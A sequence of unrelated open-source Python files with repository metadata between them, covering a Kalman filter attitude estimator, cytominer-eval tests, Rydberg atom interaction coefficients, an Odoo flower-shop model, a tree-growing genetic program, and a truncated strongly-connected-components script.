logging.info(f'{compinserted}/{nfiles} compositions inserted successfully')
print(f'{nfiles-compinserted}/{nfiles} compositions with errors')
if(check):
print(f'{compok}/{compinserted} checked successfully')
logging.info(f'{compok}/{compinserted} checked successfully')
print(f'{compinserted-compok}/{compinserted} checked unsuccessfully')
logging.info(f'{compinserted-compok}/{compinserted} checked unsuccessfully')
if __name__ == '__main__':
main()
|
crs4/TO_OPENEHR_CONVERTER
|
COMPOSITIONS_UPLOADER/CompositionUploader.py
|
CompositionUploader.py
|
py
| 11,566 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23213929420
|
"""
IMU 6-DOF
Acceleration
- imu_accel_x
- imu_accel_y
- imu_accel_z
Angular speed
- imu_gyro_x
- imu_gyro_y
- imu_gyro_z
"""
import numpy as np
from numpy.linalg import inv
from scipy.spatial.transform import Rotation as rot
"""
X: states:
- pitch
- roll
- yaw (not used)
- bias angular rate pitch
- bias angular rate roll
- bias angular rate yaw
Note: In order to compute yaw, an additional sensor like a magnetometer is required.
u: inputs
- Euler angles
"""
class INS_filter:
def __init__(self, data):
dt = 1e-2
self.X = np.zeros([6,1]) # error in Euler angles, gyro biases
self.X[0] = -np.arctan2(data["imu_accel_y"], np.sqrt(data["imu_accel_y"]**2+data["imu_accel_z"]**2))
self.X[1] = np.arctan2(data["imu_accel_x"], np.sqrt(data["imu_accel_x"]**2+data["imu_accel_z"]**2))
self.Cnb = rot.from_euler("xyz", self.X[0:3].transpose()).as_matrix()[0]
self.P = np.identity(6)
# Process model
self.F = np.identity(6)
self.F[0:3,3:6] = -dt*self.Cnb
# Control action model
self.B = np.zeros([6,3])
self.B[0:3, 0:3] = np.identity(3)*dt
# Observation matrix
self.H = np.zeros([3,6])
self.H[0:3, 0:3] = np.identity(3)
# Process noise matrix
self.gyro_psd = 3.5e-4
self.gyro_bias_psd = 1e-7
self.Q = np.zeros([6,6])
self.updateQ(dt)
# Sensor noise matrix (accel)
self.R = np.zeros([3,3])
self.R[0][0] = 5
self.R[1][1] = 5
self.R[2][2] = 5
def updateQ(self, dt):
self.Q[0:3, 0:3] = np.identity(3)*self.gyro_psd*dt
self.Q[3:6, 3:6] = np.identity(3) * self.gyro_bias_psd * dt
def predict(self, w, dt): # w is the angular rate vector
self.Cnb = rot.from_euler("xyz", self.X[0:3].transpose()).as_matrix()[0]
u = w.transpose()
self.updateQ(dt)
#update dt
self.F[0:3,3:6] = -dt*self.Cnb
self.B[0:3, 0:3] = dt*self.Cnb
# build pseudo control var u
        self.X = self.F@self.X + self.B@u
        self.P = self.F@self.P@self.F.transpose() + self.Q
def updateAttitude(self, a_bib):
z = self.getEulerAnglesFromAccel(a_bib.transpose())
        y = z - self.H@self.X
        S = self.H@self.P@self.H.transpose() + self.R
        K = (self.P@self.H.transpose())@inv(S)
self.X = self.X+K@y
I = np.identity(6)
        self.P = (I-K@self.H)@self.P
def getEulerAnglesFromAccel(self, a_bib):
eul_nb = np.zeros([3,1])
eul_nb[0] = -np.arctan2(a_bib[1], np.sqrt(a_bib[1]**2+a_bib[2]**2))
eul_nb[1] = np.arctan2(a_bib[0], np.sqrt(a_bib[0]**2+a_bib[2]**2))
return eul_nb
    def get_states(self):
        # np.asscalar() has been removed from NumPy; .item() is the equivalent scalar extraction
        return {"roll": self.X[0].item()*180/np.pi,
                "pitch": self.X[1].item()*180/np.pi,
                "yaw": self.X[2].item()*180/np.pi,
                "gyro_bias_roll": self.X[3].item()*180/np.pi,
                "gyro_bias_pitch": self.X[4].item()*180/np.pi}
def run_filter_simulation(df):
import time
start = time.time()
init = False
kf_ins_res = {"roll": [], "pitch":[], "yaw":[], "gyro_bias_roll":[], "gyro_bias_pitch":[]}
last_time = 0
for index, row in df.iterrows():
if not init:
ins_kf = INS_filter(row)
init = True
last_time = row["time"] - 1e-2
# Note: in a real-time system, the prediction step should run at each iteration
# This hack is only used here for simulation purposes
if row["imu_new_data"]:
dt = row["time"] - last_time
ins_kf.predict(np.matrix([row["imu_gyro_x"], row["imu_gyro_y"], row["imu_gyro_z"]]), dt)
last_time = row["time"]
if row["imu_new_data"]:
ins_kf.updateAttitude(np.matrix([row["imu_accel_x"], row["imu_accel_y"], row["imu_accel_z"]]))
res = ins_kf.get_states()
kf_ins_res["roll"].append(res["roll"])
kf_ins_res["pitch"].append(res["pitch"])
kf_ins_res["yaw"].append(res["yaw"])
kf_ins_res["gyro_bias_roll"].append(res["gyro_bias_roll"])
kf_ins_res["gyro_bias_pitch"].append(res["gyro_bias_pitch"])
end = time.time()
print(f"Execution time: {end - start} s")
import matplotlib.pyplot as plt
f, ax = plt.subplots(4, 1)
ax[0].set_title("Roll")
ax[0].plot(df["time"], kf_ins_res["roll"], label="roll")
ax[1].set_title("Pitch")
ax[1].plot(df["time"], kf_ins_res["pitch"], label="pitch")
ax[2].set_title("Gyro bias roll")
ax[2].plot(df["time"], kf_ins_res["gyro_bias_roll"], label="gyro_bias_roll")
ax[3].set_title("Gyro bias pitch")
ax[3].plot(df["time"], kf_ins_res["gyro_bias_pitch"], label="gyro_bias_pitch")
plt.subplots_adjust(hspace=0.4)
    f.canvas.manager.set_window_title('Kalman Filter INS')
f.suptitle("Kalman Filter INS")
# f.legend()
plt.show()
if __name__ == "__main__":
import pandas as pd
data = pd.read_csv("gns_ins_data2.csv")
run_filter_simulation(data)
|
toshiharutf/Kalman_Filter_GNS_INS
|
ins_filter_full_state_demo.py
|
ins_filter_full_state_demo.py
|
py
| 5,133 |
python
|
en
|
code
| 6 |
github-code
|
6
|
28800553771
|
import os
import pytest
import pathlib
import numpy as np
import pandas as pd
from math import isclose
from cytominer_eval.operations import mp_value
from cytominer_eval.utils.mpvalue_utils import (
calculate_mp_value,
calculate_mahalanobis,
)
# Load CRISPR dataset
example_file = "SQ00014610_normalized_feature_select.csv.gz"
example_file = pathlib.Path(
"{file}/../../example_data/gene/{eg}".format(
file=os.path.dirname(__file__), eg=example_file
)
)
df = pd.read_csv(example_file)
meta_features = [
x for x in df.columns if (x.startswith("Metadata_") or x.startswith("Image_"))
]
features = df.drop(meta_features, axis="columns").columns.tolist()
control_perts = ["Luc-2", "LacZ-2", "LacZ-3"]
replicate_id = "Metadata_pert_name"
def test_calculate_mahalanobis():
sub_df = df[(df.Metadata_WellRow == "A") & (df.Metadata_pert_name == "EMPTY")][
features
]
control_df = df[df[replicate_id].isin(control_perts)][features]
maha = calculate_mahalanobis(pert_df=sub_df, control_df=control_df)
assert isinstance(maha, float)
# The following value is empirically determined
# and not theoretically justified but avoids unwanted
# changes in the implementation of the Mahalanobis distance
assert isclose(maha, 3.62523778789, abs_tol=1e-09)
maha = calculate_mahalanobis(pert_df=control_df, control_df=control_df)
# Distance to itself should be approximately zero
assert isclose(maha, 0, abs_tol=1e-05)
def test_calculate_mp_value():
# The mp-values are empirical p-values
# so they range from 0 to 1, with low values
# showing a difference to the control condition.
sub_df = df[(df.Metadata_WellRow == "A") & (df.Metadata_pert_name == "EMPTY")][
features
]
control_df = df[df[replicate_id].isin(control_perts)][features]
# Avoid fluctuations in permutations
np.random.seed(2020)
result = calculate_mp_value(pert_df=sub_df, control_df=control_df)
assert isinstance(result, float)
assert result > 0
assert result < 1
# Distance to itself should be approximately zero
# So mp-value should be 1
result = calculate_mp_value(
pert_df=control_df, control_df=control_df, params={"nb_permutations": 2000}
)
assert isclose(result, 1, abs_tol=1e-02)
with pytest.raises(AssertionError) as ae:
result = calculate_mp_value(
pert_df=control_df, control_df=control_df, params={"not_a_parameter": 2000}
)
assert "Unknown parameters provided. Only" in str(ae.value)
def test_mp_value():
result = mp_value(
df=df,
control_perts=control_perts,
replicate_id=replicate_id,
features=features,
)
assert "mp_value" in result.columns
assert all(result.mp_value <= 1)
assert all(result.mp_value >= 0)
assert len(np.unique(df[replicate_id])) == len(result)
with pytest.raises(AssertionError) as ae:
result = mp_value(
df=df,
control_perts=control_perts,
replicate_id=replicate_id,
features=features,
params={"not_a_parameter": 2000},
)
assert "Unknown parameters provided. Only" in str(ae.value)
|
cytomining/cytominer-eval
|
cytominer_eval/tests/test_operations/test_mp_value.py
|
test_mp_value.py
|
py
| 3,230 |
python
|
en
|
code
| 7 |
github-code
|
6
|
34218646786
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 6 12:31:40 2023
@author: tillappel
"""
from arc import *
from IPython.display import display, HTML
import numpy as np
import scipy.constants as sc
import matplotlib.pyplot as plt
def find_largest_c3(n,n_2, l0, j0):
largest_c3_d0 = 0
largest_c3_d1 = 0
largest_i_d0 = 0
largest_i_d1 = 0
largest_j_d0 = 0
largest_j_d1 = 0
largest_transition_d0 = ""
largest_transition_d1 = ""
atom = Rubidium()
# Iterate over combinations of i and j
for i in range(1, 4):
for j in range(1, 4):
# Calculate the dipole matrix element for pi/pi transition with d=0
dsDME_pi_d0 = atom.getDipoleMatrixElement(n, l0, j0, j0, n+i, np.abs(l0-1), np.abs(j0-1), np.abs(j0), 0)
dpDME_pi_d0 = atom.getDipoleMatrixElement(n_2, l0, j0, j0, n_2-j, l0+1, j0, j0, 0)
c3_pi_d0 = (
1
/ (4.0 * np.pi * sc.epsilon_0)
* dsDME_pi_d0
* dpDME_pi_d0
* C_e**2
* (sc.physical_constants["Bohr radius"][0]) ** 2
)
# Calculate the dipole matrix element for sigma+/sigma- transition with d=0
dsDME_sigma_d0 = atom.getDipoleMatrixElement(n, l0, j0, j0, n+i, np.abs(l0-1), np.abs(j0-1), np.abs(j0), -1)
dpDME_sigma_d0 = atom.getDipoleMatrixElement(n_2, l0, j0, j0, n_2-j, l0+1, j0, j0, 1)
c3_sigma_d0 = (
1
/ (4.0 * np.pi * sc.epsilon_0)
* dsDME_sigma_d0
* dpDME_sigma_d0
* C_e**2
* (sc.physical_constants["Bohr radius"][0]) ** 2
)
# Compare the calculated c3 coefficients with d=0 and update the largest values
if abs(c3_pi_d0) > abs(largest_c3_d0):
largest_c3_d0 = c3_pi_d0
largest_i_d0 = i
largest_j_d0 = j
largest_transition_d0 = "pi/pi"
if abs(c3_sigma_d0) > abs(largest_c3_d0):
largest_c3_d0 = c3_sigma_d0
largest_i_d0 = i
largest_j_d0 = j
largest_transition_d0 = "sigma+/sigma-"
# Calculate the dipole matrix element for pi/pi transition with d=1
dsDME_pi_d1 = atom.getDipoleMatrixElement(n, l0, j0, j0, n+i, np.abs(l0-1), np.abs(j0-1), np.abs(j0-1), 0)
dpDME_pi_d1 = atom.getDipoleMatrixElement(n_2, l0, j0, j0, n_2-j, l0+1, j0+1, j0+1, 0)
c3_pi_d1 = (
1
/ (4.0 * np.pi * sc.epsilon_0)
* dsDME_pi_d1
* dpDME_pi_d1
* C_e**2
* (sc.physical_constants["Bohr radius"][0]) ** 2
)
# Calculate the dipole matrix element for sigma+/sigma- transition with d=1
dsDME_sigma_d1 = atom.getDipoleMatrixElement(n, l0, j0, j0, n+i, np.abs(l0-1), np.abs(-1+j0), np.abs(-1+j0), -1)
dpDME_sigma_d1 = atom.getDipoleMatrixElement(n_2, l0, j0, j0, n_2-j, l0+1, 1+j0, 1+j0, 1)
c3_sigma_d1 = (
1
/ (4.0 * np.pi * sc.epsilon_0)
* dsDME_sigma_d1
* dpDME_sigma_d1
* C_e**2
* (sc.physical_constants["Bohr radius"][0]) ** 2
)
# Compare the calculated c3 coefficients with d=1 and update the largest values
if abs(c3_pi_d1) > abs(largest_c3_d1):
largest_c3_d1 = c3_pi_d1
largest_i_d1 = i
largest_j_d1 = j
largest_transition_d1 = "pi/pi"
if abs(c3_sigma_d1) > abs(largest_c3_d1):
largest_c3_d1 = c3_sigma_d1
largest_i_d1 = i
largest_j_d1 = j
largest_transition_d1 = "sigma+/sigma-"
return (
largest_i_d0, largest_j_d0, largest_transition_d0, abs(largest_c3_d0) / C_h * 1.0e9,
largest_i_d1, largest_j_d1, largest_transition_d1, abs(largest_c3_d1) / C_h * 1.0e9
)
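# Added explanatory note (not part of the original script): the quantity computed
# above is the resonant dipole-dipole coefficient C3 = d1*d2*e^2*a0^2/(4*pi*eps0),
# where d1 and d2 are the dipole matrix elements in units of e*a0; dividing by
# Planck's constant and multiplying by 1e9 expresses the result in GHz*(um)^3.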
# Specify the value of n, l0, and j0
n = 59
n_2 = 59
l = 0
j = 0.5
# Find the largest C3 coefficients for d=0 and d=1, and their corresponding i, j, and transition
largest_i_d0, largest_j_d0, largest_transition_d0, largest_c3_d0, largest_i_d1, largest_j_d1, largest_transition_d1, largest_c3_d1 = find_largest_c3(n, n_2, l, j)
# Print the results
print("For d=0:")
print("Largest C3 of Rb(%dP -> %dS/%dD) = %.3f GHz (µm)^3 (i = %d, j = %d, Transition = %s)" % (n, n-largest_i_d0, n+largest_j_d0, largest_c3_d0, largest_i_d0, largest_j_d0, largest_transition_d0))
print("For d=1:")
print("Largest C3 of Rb(%dP -> %dS/%dD) = %.3f GHz (µm)^3 (i = %d, j = %d, Transition = %s)" % (n, n-largest_i_d1, n+largest_j_d1, largest_c3_d1, largest_i_d1, largest_j_d1, largest_transition_d1))
'--------------------------------------------------'
#resonant interaction of groundstate to excited state with opposite parity
atom = Rubidium(cpp_numerov=False)
dme = atom.getDipoleMatrixElement(63, 1, 1/2, 1/2, 40, 0, 1/2, 1/2, +1)
c3_2 = (
1
/ (4.0 * np.pi * sc.epsilon_0)
* dme
* dme
* C_e**2
* (sc.physical_constants["Bohr radius"][0]) ** 2
)
print("C_3 of Rb(63 S -> 61P) = %.3f GHz (mu m)^3 " % (abs(c3_2) / C_h * 1.0e9))
'================================================='
# Evaluation of the Cs 60S_1/2 C6 coefficient using perturbation theory (Theta=0,phi=0)
l0 = 0
j0 = 0.5
mj0 = 0.5
# Target State
theta = 0
# Polar Angle [0-pi]
phi = 0
# Azimuthal Angle [0-2pi]
dn = 5
# Range of n to consider (n0-dn:n0+dn)
deltaMax = 25e9 # Max pair-state energy difference [Hz]
# Set target-state and extract value
calculation = PairStateInteractions(
Rubidium(), n, l0, j0, n, l0, j0, mj0, mj0
)
C6 = calculation.getC6perturbatively(theta, phi, dn, deltaMax)
print("C6 [%s] = %.2f GHz (mum)^6" % (printStateString(n, l0, j0), C6))
'--------------------------------------------------'
# Define a range of values for n
n_values = range(30, 80)
a_1 = 1 #µm
# Lists to store the C3 and C6 coefficients for d=0 and d=1
c3_values_d0 = []
c3_values_d1 = []
c6_values = []
# Iterate over the values of n
for n in n_values:
# Find the largest C3 coefficients for d=0 and d=1, and their corresponding i, j, and transition
largest_i_d0, largest_j_d0, largest_transition_d0, largest_c3_d0, largest_i_d1, largest_j_d1, largest_transition_d1, largest_c3_d1 = find_largest_c3(n, n_2, l0, j0)
# Append the largest C3 coefficients to the respective c3_values lists
c3_values_d0.append(largest_c3_d0 / a_1**3)
c3_values_d1.append(largest_c3_d1 / a_1**3)
# Calculate the C6 coefficient
calculation = PairStateInteractions(
Rubidium(), n, l0, j0, n, l0, j0, mj0, mj0
)
C6 = calculation.getC6perturbatively(theta, phi, dn, deltaMax)
# Append the C6 coefficient to the c6_values list
c6_values.append(np.abs(C6) / a_1**6)
# Plotting the C3 and C6 coefficients
#plt.plot(n_values, c3_values_d1, label="Largest C3 Coefficient")
#plt.plot(n_values, c3_values_d1, label="C3 Coefficient (d=1)")
#plt.plot(n_values, c6_values, label="C6 Coefficient")
'-------------------'
plt.semilogy(n_values, c3_values_d0, label="Largest C3 Coefficient") #CURRENTLY: d=1
plt.semilogy(n_values, c6_values, label="C6 Coefficient")
'-------------------'
plt.xlabel("n")
plt.ylabel("C3, C6 [GHz]")
plt.legend(fontsize = "large", loc="upper left")
plt.title("C3 & C6 coefficients of Rb |n,S>")
plt.savefig('log plot S c3,c6.png', dpi=300)
plt.show()
|
tappelnano/RydbergPTG
|
ARC C3_C6 calc.py
|
ARC C3_C6 calc.py
|
py
| 7,589 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34565307158
|
from random import random, randint
from collections import deque
from math import sin, cos
MAXVAL = 200
MAXINSTR = 12
def new_random_code(length):
return [
(randint(0, MAXINSTR)) if random() > 0.5 else (randint(MAXINSTR + 1, MAXVAL))
for _ in range(length)
]
def point_mutate(code):
code[randint(0, len(code) - 1)] = (
(randint(0, MAXINSTR)) if random() > 0.5 else (randint(MAXINSTR + 1, MAXVAL))
)
def safe_pop(stack, default=0):
try:
return stack.pop()
except IndexError:
return default
def grow_bud(pos, code, n):
offspring = []
history = deque()
ang = 0
stack = deque()
x, y = pos
for instruction in code:
if instruction > 12: # number
stack.append(instruction - 13)
else:
if instruction == 1: # rotCW
history.append((x, y, ang))
ang += safe_pop(stack)
elif instruction == 2: # rotCCW
history.append((x, y, ang))
ang -= safe_pop(stack)
elif instruction == 3: # undo
x, y, ang = safe_pop(history, (x, y, ang))
elif instruction == 4: # move
history.append((x, y, ang))
dist = safe_pop(stack)
x -= sin(ang) * dist
y += cos(ang) * dist
elif instruction == 5: # place
offspring.append((x, y))
elif instruction == 6: # ref n
stack.append(n)
elif instruction == 7: # +
stack.append(safe_pop(stack) + safe_pop(stack))
elif instruction == 8: # -
stack.append(safe_pop(stack) - safe_pop(stack))
elif instruction == 9: # *
stack.append(safe_pop(stack) * safe_pop(stack))
elif instruction == 10: # /
try:
stack.append(safe_pop(stack) / safe_pop(stack, 1))
except ZeroDivisionError:
pass
elif instruction == 11: # ref x
stack.append(x)
elif instruction == 12: # ref y
stack.append(y)
return offspring
def grow_tree(code, iters=3):
bud_positions = [(0, 0)]
branch_positions = []
for n in range(iters):
new_bud_positions = []
for bud_pos in bud_positions:
for new_pos in grow_bud(bud_pos, code, n):
branch_positions.append((*bud_pos, *new_pos))
new_bud_positions.append(new_pos)
bud_positions = new_bud_positions
return bud_positions, branch_positions
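# Minimal usage sketch (added for illustration, not part of the original file):
# generate a random genome, apply one point mutation, and grow a tree from it.
# The genome length and iteration count are arbitrary illustrative choices.
if __name__ == "__main__":
    code = new_random_code(30)
    point_mutate(code)
    buds, branches = grow_tree(code, iters=3)
    print(f"{len(buds)} buds, {len(branches)} branch segments")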
|
gwfellows/trees
|
grow.py
|
grow.py
|
py
| 2,644 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5355406850
|
from odoo import models, fields, api
class StockProductionLot(models.Model):
_inherit = "stock.production.lot"
is_flower = fields.Boolean(related='product_id.is_flower', readonly=True)
water_ids = fields.One2many("flower.water", "serial_id")
@api.model_create_multi
def create(self, vals_list):
for vals in vals_list:
product = self.env["product.product"].browse(vals["product_id"])
if product.sequence_id:
vals["name"] = product.sequence_id.next_by_id()
return super().create(vals_list)
def action_water_flower(self):
flowers = self.filtered(lambda rec: rec.is_flower)
for record in flowers:
if record.water_ids:
last_watered_date = record.water_ids[0].watering_date
frequency = record.product_id.flower_id.watering_frequency
today = fields.Date.today()
if (today - last_watered_date).days < frequency:
continue
self.env["flower.water"].create({
"flower_id": record.product_id.flower_id.id,
"watering_date" :fields.Date.today(),
"serial_id": record.id,
})
def action_open_watering_times(self):
self.ensure_one()
action = {
'name': 'Watering Times',
'type': 'ir.actions.act_window',
'res_model': 'flower.water',
'view_mode': 'tree,form',
'domain': [('serial_id', '=', self.id)],
}
return action
|
omar99emad/flower-shop
|
models/stock_production_lot.py
|
stock_production_lot.py
|
py
| 1,586 |
python
|
en
|
code
| 0 |
github-code
|
6
|
74190845628
|
# -*- coding: utf-8 -*-
__author__ = "ALEX-CHUN-YU ([email protected])"
from word2vec import Word2Vec as w2v
import MySQLdb
import numpy as np
from bert_embedding import BertEmbedding
import codecs
import re
# Entity to Vector
class E2V_BERT:
# init
def __init__(self):
self.db = MySQLdb.connect(host = "127.0.0.1", user = "root", passwd = "wmmkscsie", db = "recommender_system", charset = "utf8")
self.cursor = self.db.cursor()
self.articles_ner_tag = []
self.movies_ner_tag = []
        # Build an entity-to-vector dictionary for use in later experiments
self.entity_and_vector = []
# main function
def e2v_bert(self):
        # Produce vectors via BERT embeddings and store the generated relationship and scenario features
self.load_data()
self.extract_vector_and_save_vector(dimension = 768)
# self.produce_entity_vector_table()
# load data
def load_data(self):
# articles ner 221269
self.cursor.execute("SELECT a.id, a.content_ner_tag FROM articles_ner as a, articles as b Where a.id = b.id and a.id >= 0 and a.id <= 0 and b.relationship_type != ''")
self.articles_ner_tag = self.cursor.fetchall()
# movies ner 3722
self.cursor.execute("SELECT a.id, a.storyline_ner_tag FROM movies_ner as a, movies as b Where a.id = b.id and a.id >= 1 and a.id <= 3722 and b.scenario_type != ''")
self.movies_ner_tag = self.cursor.fetchall()
    # Obtain the vectors (using BERT) and build and store the relationship and scenario features
def extract_vector_and_save_vector(self, dimension):
bert_embedding = BertEmbedding(model = 'bert_12_768_12', dataset_name='wiki_cn', max_seq_length = 50)
# self.articles_ner_tag = [[1, "人:none 失戀:em 悲觀:em 房間:lo 感到:none 難過:em @ 戀情:em 感到:none 傷心:em 值得:none 人:none 人:none 失戀:em@後會:none 傷害自己:ev 事業:none 失敗:ev 事情:none 失敗:em 忘:ev 走:ev"]]
# self.movies_ner_tag = [[1, "戀情:ev 感到:none "], [2, "人:none 失戀:em 悲觀:em 房間:lo 感到:none 難過:em @ 戀情:ev 感到:none "]]
for article_ner_tag in self.articles_ner_tag:
article_id = article_ner_tag[0]
sentences_ner_tag = article_ner_tag[1]
print("article_id:", end = '')
print(article_id)
relationship_e2v_bert = []
scenario_e2v_bert = []
sentences = []
entity_type_position_length_in_sentences = []
for sentence_ner_tag in sentences_ner_tag.split('@'):
                if sentence_ner_tag != "":
sentence = ""
entity_type_position_length_in_sentence = []
for term_ner_tag in sentence_ner_tag.split(' '):
if " " not in term_ner_tag and term_ner_tag != "":
# print(term_ner_tag)
term_ner_tag = term_ner_tag.split(':')
term = term_ner_tag[0]
tag = term_ner_tag[1]
position = int(term_ner_tag[2])
length = int(term_ner_tag[3])
entity_type_position_length_in_sentence.append([term, tag, position, length])
sentence += term
sentences.append(sentence)
# print(len(entity_type_position_length_in_sentence))
entity_type_position_length_in_sentences.append(entity_type_position_length_in_sentence)
print(sentences)
print(entity_type_position_length_in_sentences)
results = bert_embedding(sentences)
print("文章長度:", end = "")
print(len(results))
po_vector = np.zeros(dimension)
em_vector = np.zeros(dimension)
ev_vector = np.zeros(dimension)
lo_vector = np.zeros(dimension)
ti_vector = np.zeros(dimension)
po_count = 0
em_count = 0
ev_count = 0
lo_count = 0
ti_count = 0
for i, result in enumerate(results):
print(sentences[i])
print(entity_type_position_length_in_sentences[i])
print(result[0])
for i, entity in enumerate(entity_type_position_length_in_sentences[i]):
entity_vector = np.zeros(dimension)
try:
for i in range(entity[3]):
entity_vector += result[1][entity[2] + 1 + i]
except:
print("some illegal characters")
break
if entity[1] == 'none':
pass
elif entity[1] == 'po':
po_vector += entity_vector
po_count += 1
elif entity[1] == 'em':
em_vector += entity_vector
em_count += 1
elif entity[1] == 'ev':
ev_vector += entity_vector
ev_count += 1
elif entity[1] == 'lo':
lo_vector += entity_vector
lo_count += 1
elif entity[1] == 'ti':
ti_vector += entity_vector
ti_count += 1
                    # Build the BERT entity table
# self.entity_and_vector.append([entity[0], entity_vector])
print(po_vector[:5])
print(em_vector[:5])
print(ev_vector[:5])
print(lo_vector[:5])
print(ti_vector[:5])
# print(po_count)
# print(em_count)
# print(ev_count)
# print(lo_count)
# print(ti_count)
if po_count == 0:
po_count = 1
if em_count == 0:
em_count = 1
if ev_count == 0:
ev_count = 1
if lo_count == 0:
lo_count = 1
if ti_count == 0:
ti_count = 1
relationship_e2v_bert = np.append(relationship_e2v_bert, po_vector/po_count)
relationship_e2v_bert = np.append(relationship_e2v_bert, em_vector/em_count)
relationship_e2v_bert = np.append(relationship_e2v_bert, ev_vector/ev_count)
relationship_e2v_bert = np.append(relationship_e2v_bert, lo_vector/lo_count)
relationship_e2v_bert = np.append(relationship_e2v_bert, ti_vector/ti_count)
scenario_e2v_bert = np.append(scenario_e2v_bert, em_vector/em_count)
scenario_e2v_bert = np.append(scenario_e2v_bert, ev_vector/ev_count)
print(relationship_e2v_bert.shape)
print(scenario_e2v_bert.shape)
# print(relationship_e2v_bert[1536])
# print(relationship_e2v_bert[2304])
sql = "UPDATE articles_vector SET relationship_e2v_bert=%s, scenario_e2v_bert=%s WHERE id=%s"
val = (str(list(relationship_e2v_bert)), str(list(scenario_e2v_bert)), article_id)
self.cursor.execute(sql, val)
self.db.commit()
print("="*10)
for movie_ner_tag in self.movies_ner_tag:
movie_id = movie_ner_tag[0]
sentences_ner_tag = movie_ner_tag[1]
print("movie_id:", end = '')
print(movie_id)
scenario_e2v_bert = []
sentences = []
entity_type_position_length_in_sentences = []
for sentence_ner_tag in sentences_ner_tag.split('@'):
if sentence_ner_tag != "":
sentence = ""
entity_type_position_length_in_sentence = []
for term_ner_tag in sentence_ner_tag.split(' '):
if " " not in term_ner_tag and term_ner_tag != "":
term_ner_tag = term_ner_tag.split(':')
term = term_ner_tag[0]
tag = term_ner_tag[1]
position = int(term_ner_tag[2])
length = int(term_ner_tag[3])
entity_type_position_length_in_sentence.append([term, tag, position, length])
sentence += term
sentences.append(sentence)
# print(len(entity_type_position_length_in_sentence))
entity_type_position_length_in_sentences.append(entity_type_position_length_in_sentence)
print(sentences)
print(entity_type_position_length_in_sentences)
results = bert_embedding(sentences)
print("故事情節長度:", end = "")
print(len(results))
em_vector = np.zeros(dimension)
ev_vector = np.zeros(dimension)
em_count = 0
ev_count = 0
for i, result in enumerate(results):
print(sentences[i])
print(entity_type_position_length_in_sentences[i])
print(result[0])
for i, entity in enumerate(entity_type_position_length_in_sentences[i]):
entity_vector = np.zeros(dimension)
try:
for i in range(entity[3]):
entity_vector += result[1][entity[2] + 1 + i]
except:
print("some illegal characters")
break
if entity[1] == 'none':
pass
elif entity[1] == 'po':
pass
elif entity[1] == 'em':
em_vector += entity_vector
em_count += 1
elif entity[1] == 'ev':
ev_vector += entity_vector
ev_count += 1
elif entity[1] == 'lo':
pass
elif entity[1] == 'ti':
pass
# self.entity_and_vector.append([entity[0], entity_vector])
print(em_vector[:5])
print(ev_vector[:5])
# print(em_count)
# print(ev_count)
if em_count == 0:
em_count = 1
if ev_count == 0:
ev_count = 1
scenario_e2v_bert = np.append(scenario_e2v_bert, em_vector/em_count)
scenario_e2v_bert = np.append(scenario_e2v_bert, ev_vector/ev_count)
print(scenario_e2v_bert.shape)
sql = "UPDATE movies_vector SET scenario_e2v_bert=%s WHERE id=%s"
val = (str(list(scenario_e2v_bert)), movie_id)
self.cursor.execute(sql, val)
self.db.commit()
print("="*10)
    # Produce the entity-to-vector table (each entity appears only once)
def produce_entity_vector_table(self):
entity_dict = {}
entity_count = {}
mode = "w"
file = "e2v_bert_table.txt"
with codecs.open(file, mode = mode, encoding = 'utf8') as vector_table:
for entity_vector in self.entity_and_vector:
if entity_vector[0] not in entity_dict.keys():
entity_dict[entity_vector[0]] = entity_vector[1]
entity_count[entity_vector[0]] = 1
else:
entity_dict[entity_vector[0]] = entity_dict[entity_vector[0]] + entity_vector[1]
entity_count[entity_vector[0]] = entity_count[entity_vector[0]] + 1
for entity, count in entity_count.items():
entity_dict[entity] = entity_dict[entity]/count
for entity, vector in entity_dict.items():
vector_table.write(entity + ":")
vector_table.write(str(list(vector)))
vector_table.write("\n")
vector_table.close()
if __name__ == "__main__":
e2v_bert = E2V_BERT()
e2v_bert.e2v_bert()
|
Alex-CHUN-YU/Recommender-System
|
main_embedding/e2v_bert.py
|
e2v_bert.py
|
py
| 9,420 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31237691124
|
# 3: Create a "Medical questionnaire" program that asks the user for the following data: first name, last name, age and weight.
# Print a result according to which:
# The patient is in good condition if they are up to 30 years old and weigh between 50 and 120 kg,
# The patient should take better care of themselves if they are over 30 and weigh less than 50 or more than 120 kg,
# The patient needs a medical examination if they are over 40 and weigh less than 50 or more than 120 kg.
# You may handle all the remaining cases however you see fit.
name = input('Enter your first name: ')
last_name = input('Enter your last name: ')
age = int(input('Enter your age: '))
weight = int(input('Enter your weight: '))
if age <= 30 and weight >= 50 and weight <= 120:
    print(f'{name} {last_name}, age {age}, weight {weight} - good condition')
elif age > 30 and age <= 40 and (weight < 50 or weight > 120):
    print(f'{name} {last_name}, age {age}, weight {weight} - you should start looking after your health')
elif age > 40 and (weight < 50 or weight > 120):
    print(f'{name} {last_name}, age {age}, weight {weight} - see a doctor as soon as possible')
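# The task leaves all remaining cases to the implementer; one illustrative way
# to cover them (an addition, not part of the original solution):
else:
    print(f'{name} {last_name}, age {age}, weight {weight} - no special recommendations')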
|
dreaminkv/python-basics
|
practical-task-1/practical-task-3.py
|
practical-task-3.py
|
py
| 1,573 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
36522225710
|
from sys import setrecursionlimit
import threading
RECURSION_LIMIT = 10 ** 9
STACK_SIZE = 2 ** 26
setrecursionlimit(RECURSION_LIMIT)
threading.stack_size(STACK_SIZE)
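# Descriptive note added for clarity: this is Kosaraju's two-pass algorithm for
# strongly connected components. The first DFS records vertices in order of
# completion; the second DFS, run on the reversed graph in decreasing completion
# order, labels each component. The printed result is the number of distinct
# edges between different components (i.e. edges of the condensation graph).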
def dfs(v, used, g, answer):
used[v] = 1
for u in g[v]:
if used[u] == 0:
dfs(u, used, g, answer)
answer.append(v)
def dfs_2(v, color, cur, g_back):
color[v] = cur
for u in g_back[v]:
if color[u] == 0:
dfs_2(u, color, cur, g_back)
def main():
n, m = map(int , input().split())
g = []
g_back = []
for _ in range(n):
g.append([])
g_back.append([])
for _ in range(m):
pair = list(map(int, input().split()))
g[pair[0] - 1].append(pair[1] - 1)
g_back[pair[1] - 1].append(pair[0] - 1)
used = [0] * n
color = [0] * n
answer = []
for v in range(n):
if used[v] == 0:
dfs(v, used, g, answer)
answer.reverse()
cnt = 0
for v in answer:
